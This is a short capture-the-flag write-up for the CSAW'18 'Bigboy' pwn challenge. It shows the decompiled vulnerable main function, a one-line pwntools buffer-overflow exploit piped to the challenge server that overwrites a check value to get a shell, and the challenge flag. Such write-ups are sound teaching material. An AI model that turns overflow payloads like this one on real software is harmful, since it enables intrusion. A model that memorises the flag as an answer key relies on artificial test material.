CSAW’18 CTF Qualification: Bigboy
| Event | Challenge | Category | Points | Solves |
|---|---|---|---|---|
| CSAW’18 CTF Qualification | Bigboy | Pwn | 25 | 656 |
Description
Only big boi pwners will get this one!
nc pwn.chal.csaw.io 9000
You can download the elf file here : boi
TL;DR
This challenge is a simple buffer overflow with a check that may lead to
code execution. It’s an easy pwn, so one liner is the way to go !
Methology
Step 1 : Use ida to decompile the program and not lose time, then, overflow with the good value many time, to access the “/bin/bash”.
int __cdecl main(int argc, const char **argv, const char **envp)
{
__int64 buf; // [rsp+10h] [rbp-30h]
__int64 v5; // [rsp+18h] [rbp-28h]
__int64 v6; // [rsp+20h] [rbp-20h]
int v7; // [rsp+28h] [rbp-18h]
unsigned __int64 v8; // [rsp+38h] [rbp-8h]
v8 = __readfsqword(0x28u);
buf = 0LL;
v5 = 0LL;
v6 = 0LL;
v7 = 0;
HIDWORD(v6) = -559038737;
puts("Are you a big boiiiii??");
read(0, &buf, 0x18uLL);
if ( HIDWORD(v6) == 0xCAF3BAEE )
run_cmd("/bin/bash", &buf);
else
run_cmd("/bin/date", &buf);
return 0;
}
Step 2 : Print the cmd you want to run.
python2 -c 'from pwn import *; print p32(0xCAF3BAEE) * 6; print "cat flag.txt"' | nc pwn.chal.csaw.io 9000
Step 3 : Enjoy your free 25 points yayyyy ! \o/
The flag is : flag{Y0u_Arrre_th3_Bi66Est_of_boiiiiis}
-Laluka